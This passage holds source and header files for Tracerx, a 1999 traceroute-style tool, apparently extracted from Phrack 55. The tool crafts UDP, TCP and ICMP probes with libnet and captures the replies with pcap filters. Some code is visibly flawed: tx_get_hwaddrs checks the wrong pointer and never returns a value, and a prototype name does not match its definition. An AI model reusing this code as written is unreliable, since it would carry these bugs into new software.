* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_struct.h"
#include "./tx_util.h"
#include "./tx_error.h"
int
tx_str2int(register const char *str, register const char *what,
register int min, register int max)
{
register const char *cp;
register int val;
char *ep;
if (str[0] == '0' && (str[1] == 'x' || str[1] == 'X'))
{
cp = str + 2;
val = (int)strtol(cp, &ep, 16);
}
else
{
val = (int)strtol(str, &ep, 10);
}
if (*ep != '\0')
{
tx_error(FATAL, "\"%s\" bad value for %s \n", str, what);
}
if (val < min && min >= 0)
{
if (min == 0)
{
tx_error(FATAL, "%s must be >= %d\n", what, min);
}
else
{
tx_error(FATAL, "%s must be > %d\n", what, min - 1);
}
}
if (val > max && max >= 0)
{
tx_error(FATAL, "%s must be <= %d\n", what, max);
}
return (val);
}
int
tx_prot_select(char *protocol, struct tx_control **tx_c)
{
char *supp_protocols[] = {"UDP", "TCP", "ICMP", 0};
int i;
for (i = 0; supp_protocols[i]; i++)
{
if ((!strcasecmp(supp_protocols[i], protocol)))
{
switch (i)
{
case 0:
/* UDP */
(*tx_c)->packet_size = IP_H + UDP_H + TX_P;
return (IPPROTO_UDP);
case 1:
/* TCP */
(*tx_c)->packet_size = IP_H + TCP_H + TX_P;
return (IPPROTO_TCP);
case 2:
/* ICMP */
(*tx_c)->packet_size = IP_H + ICMP_ECHO_H + TX_P;
return (IPPROTO_ICMP);
default:
tx_error(FATAL, "Unknown protocol: %s\n", protocol);
}
}
}
tx_error(FATAL, "Unknown protocol: %s\n", protocol);
/* UNREACHED (silences compiler warnings) */
return (-1);
}
int
tx_get_hwaddrs(struct ether_addr **l, struct ether_addr **r,
struct tx_control **tx_c, u_char *errbuf)
{
*l = get_hwaddr((*tx_c)->l, (*tx_c)->device, errbuf);
if (l == NULL)
{
return (-1);
}
}
/* EOF */
<-->
<++> P55/Tracerx/tx_error.c !1962d944
/*
* $Id: tx_error.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* tx_error.c - error handling routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_error.h"
void
tx_error(int severity, char *msg, ...)
{
va_list ap;
char buf[BUFSIZ];
va_start(ap, msg);
vsnprintf(buf, sizeof(buf) - 1, msg, ap);
switch (severity)
{
case WARNING:
fprintf(stderr, "Warning: ");
break;
case CRITICAL:
fprintf(stderr, "Critical: ");
break;
case FATAL:
fprintf(stderr, "Fatal: ");
break;
}
fprintf(stderr, "%s", buf);
va_end(ap);
if (severity == FATAL)
{
exit(EXIT_FAILURE);
}
}
/* EOF */
<-->
<++> P55/Tracerx/tx_framework.h !4bc795bb
/*
* $Id: tx_framework.h,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
*
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_TRACERX_H
#define _TX_TRACERX_H
#define TX_STATIC_PORTS 0x1
#define PACKET_MIN IP_H + UDP_H + TX_P
/* min packet size */
#define PACKET_MAX 1500 /* max packet size */
#define BURST_RATE_MAX 30 /* max burst rate */
#define IP_TTL_MAX 255 /* max IP TTL */
#define PORT_MAX 65535 /* max port */
#define PROBE_MAX 100 /* max probe count per round */
#define WAIT_MAX 360 /* max time to wait for responses */
#define PCAP_BUFSIZ 576 /* bytes per packet we can capture */
int
tx_init_control(
struct tx_control **
);
int
tx_init_network(
struct tx_control **,
char *
);
int
tx_do_scan(
struct tx_control **
);
int
tx_shutdown(
struct tx_control **
);
#endif /* _TX_TRACERX_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_build.h !6de4be5c
/*
* $Id: tx_packet_build.h,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* High-level packet construction routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_BUILD_H
#define _TX_PACKET_BUILD_H
int
tx_packet_build_probe(
struct tx_control **
);
int
tx_packet_build_payload(
struct tx_control **,
int
);
int
tx_packet_build_udp(
struct tx_control **
);
int
tx_packet_build_tcp(
struct tx_control **
);
int
tx_packet_build_icmp(
struct tx_control **
);
int
tx_packet_update_probe(
struct tx_control **
);
#endif /* _TX_PACKET_BUILD_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_inject.h !9b8fc656
/*
* $Id: tx_packet_inject.h,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* High-level packet injection routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_INJECT_H
#define _TX_PACKET_INJECT_H
int
tx_packet_inject(
struct tx_control **
);
#endif /* _TX_PACKET_INJECT_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_verify.h !a40d5aef
/*
* $Id$
*
* Tracerx
* packet verification routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_VERIFY_H
#define _TX_PACKET_VERIFY_H
int
tx_packet_verify_udp(
char *,
struct tx_control **
);
int
tx_packet_verify_tcp(
char *,
struct tx_control **
);
int
tx_packet_verify_icmp(
char *,
struct tx_control **
);
#endif /* _TX_PACKET_VERIFY_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_filter.h !f4dbb92f
/*
* $Id: tx_packet_filter.h,v 1.1 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* packet filtering routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_FILTER_H
#define _TX_PACKET_FILTER_H
/*
* Since we are not putting the interface into promiscuous mode, we don't
* need to sift through packets looking for our IP; this simplfies our
* filter language. For each scan type, we of course need to receive
* ICMP TTL expired in transit type messages (ICMP type 11).
* For UDP, our terminal packet is an unreachable (ICMP type 3).
* For TCP, our terminal packet is a TCP RST (or an RST/ACK).
* For ICMP, our terminal packet is an ICMP echo reply.
* However, for the last two, we need to be prepared for unreachables as
* network conditions are unpredictable.
*/
#define TX_BPF_FILTER_UDP "icmp[0] == 11 or icmp[0] == 3"
#define TX_BPF_FILTER_TCP "icmp[0] == 11 or icmp[0] == 3 or tcp[14] == 0x12 \
or tcp[14] == 0x4 or tcp[14] == 0x14"
#define TX_BPF_FILTER_ICMP "icmp[0] == 11 or icmp[0] == 3 or icmp[0] == 0"
int
tx_set_pcap_filter(
char *, /* filter code to install */
struct tx_control **
);
#endif /* _TX_PACKET_FILTER_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_capture.h !be216cbf
/*
* $Id: tx_packet_capture.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* High-level packet injection routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_PACKET_CAPTURE_H
#define _TX_PACKET_CAPTURE_H
#define TX_PACKET_IS_BORING 0
#define TX_PACKET_IS_EXPIRED 1
#define TX_PACKET_IS_TERMINAL 2
#define TX_PACKET_IS_TERMINAL_EXOTIC 3
#define TX_PACKET_IS_UNREACH_EN_ROUTE 4
int
tx_packet_snatcher(
struct tx_control **
);
#endif /* _TX_PACKET_CAPTURE_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_main.h !1526759a
/*
* $Id: tx_main.h,v 1.2 1999/05/29 20:28:42 route Exp $
*
* TracerX
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _MAIN_H
#define _MAIN_H
#include <stdarg.h>
#include <pcap.h>
#include <libnet.h>
#define BANNER "TracerX (c) 1999 Mike D. Schiffman <mike@infonexus.com> and \
Jeremy F. Rauch\n<jrauch@cadre.org>. Distribution is unlimited provided due \
credit is given and no fee is charged.\n\nhttp://www.packetfactory.net/tracerx \
for more information.\n"
void
usage(
char *
);
#endif /* _MAIN_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_report.h !05ed6ef4
/*
* $Id$
*
* Tracerx
* Report generation routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_REPORT_H
#define _TX_REPORT_H
#include "./tx_struct.h"
void
tx_report(
int, /* The class of packet we are reporting on */
u_char *, /* The packet to report */
struct tx_control ** /* u know this one */
);
#endif /* _TX_REPORT_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_util.h !928f1bf7
/*
* $Id: tx_util.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* Misc routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_UTIL_H
#define _TX_UTIL_H
#include "./tx_struct.h"
/*
* Converts a string into an integer, handling bounding errors.
* Accepts base 10 or base 16 numbers.
* Taken from traceroute and slightly modified.
* Exits with reason upon error.
*/
int /* The converted value */
tx_str2int(
register const char *, /* The string containing the value */
register const char *, /* The title of the value (for errors only) */
register int, /* Minimum value */
register int /* Maximum value */
);
int /* The protocol number */
tc_prot_select(
char *, /* The protocol from the command line */
struct tx_control ** /* U know.. */
);
int /* 1 == ok, -1 == err */
tx_get_hwaddrs(
struct ether_addr **, /* local ethernet addr (to be filled in) */
struct ether_addr **, /* remote ethernet addr (to be filled in) */
struct tx_control **, /* U know.. */
u_char * /* errbuf */
);
#endif /* _TX_UTIL_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_error.h !b56cc374
/*
* $Id: tx_error.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* Error handling routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE. DEDICATED TO ARA.
*
*/
#ifndef _TX_ERROR_H
#define _TX_ERROR_H
#define WARNING 0x1
#define CRITICAL 0x2
#define FATAL 0x4
void
tx_error(
int,
char *,
...
);
#endif /* _TX_ERROR_H */
/* EOF */
<-->
<++> P55/Tracerx/tx_struct.h !20e7682d
/*
* $Id: tx_struct.h,v 1.2 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tracerx structure prototypes
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#ifndef _TX_STRUCT_H
#define _TX_STRUCT_H
#include <unistd.h>
#include <pcap.h>
#include <libnet.h>
/*
* Tracerx control structure.
*/
struct tx_control
{
u_char tx_flags; /* internal flags */
u_char *device; /* device to use */
u_char *tx_packet; /* pointer to the packet */
u_short ip_tos; /* IP type of service */
u_short ip_df; /* IP dont fragment */
u_short burst_rate; /* burst rate */
u_short current_ttl; /* current IP TTL */
u_short max_ttl; /* max IP TTL */
u_short initial_sport; /* initial source port */
u_short initial_dport; /* initial destination port */
u_short id; /* tracerx packet ID */
u_short use_name; /* use domain names or dotted decimals */
u_short packet_size; /* total packet size */
int packet_offset; /* IP packet offset */
int protocol; /* transport protocol in use */
int probe_cnt; /* number of probes to send per round */
int verbose; /* verbose mode */
int reading_wait; /* network reading wait */
int writing_pause; /* network writing pause */
u_long host; /* destination host */
u_long packets_sent; /* packets sent */
u_long packets_reply; /* packets we got replies back */
struct sockaddr_in sin; /* socket address structure */
struct libnet_link_int *l; /* libnet packet injection structure */
pcap_t *p; /* pcap packet listening structure */
};
/*
* Packet payload.
*/
struct tx_payload
{
u_char seq; /* packet sequence number */
u_char ttl; /* TTL packet injected with */
struct timeval tv; /* time vector */
};
#define TX_P sizeof(struct tx_payload)
#endif /* _TX_STRUCT_H */
/* EOF */
<-->
The following tarball contains the tracerx support files including the autoconf
files and documentation.
<++> P55/Tracerx/tracerx-package.tar.gz.uue !bddbaa9f
begin 644 tracerx-package.tar.gz
